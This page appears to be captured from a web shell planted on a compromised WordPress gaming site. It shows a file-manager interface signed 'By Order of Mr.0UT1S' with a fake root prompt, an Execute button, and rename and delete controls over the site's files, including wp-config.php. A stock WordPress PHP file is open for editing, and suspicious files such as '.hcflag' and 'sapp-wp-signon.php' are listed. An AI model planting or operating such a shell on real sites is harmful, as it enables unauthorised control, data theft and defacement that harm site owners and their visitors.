home
/
aioutajg
/
unblockedgames247.com
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] wp-admin
N/A
[DIR] wp-content
N/A
[DIR] wp-includes
N/A
.hcflag
30 bytes
Rename
Delete
.htaccess
2.38 KB
Rename
Delete
.htaccess.bk
514 bytes
Rename
Delete
error_log
64.26 KB
Rename
Delete
index.php
405 bytes
Rename
Delete
license.txt
19.44 KB
Rename
Delete
readme.html
7.25 KB
Rename
Delete
sapp-wp-signon.php
3.46 KB
Rename
Delete
wp-activate.php
7.21 KB
Rename
Delete
wp-blog-header.php
351 bytes
Rename
Delete
wp-comments-post.php
2.27 KB
Rename
Delete
wp-config-sample.php
3.26 KB
Rename
Delete
wp-config.php
3.49 KB
Rename
Delete
wp-cron.php
5.49 KB
Rename
Delete
wp-links-opml.php
2.44 KB
Rename
Delete
wp-load.php
3.84 KB
Rename
Delete
wp-login.php
50.21 KB
Rename
Delete
wp-mail.php
8.52 KB
Rename
Delete
wp-settings.php
29.38 KB
Rename
Delete
wp-signup.php
33.71 KB
Rename
Delete
wp-trackback.php
4.98 KB
Rename
Delete
xmlrpc.php
3.13 KB
Rename
Delete
<?php /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }
Save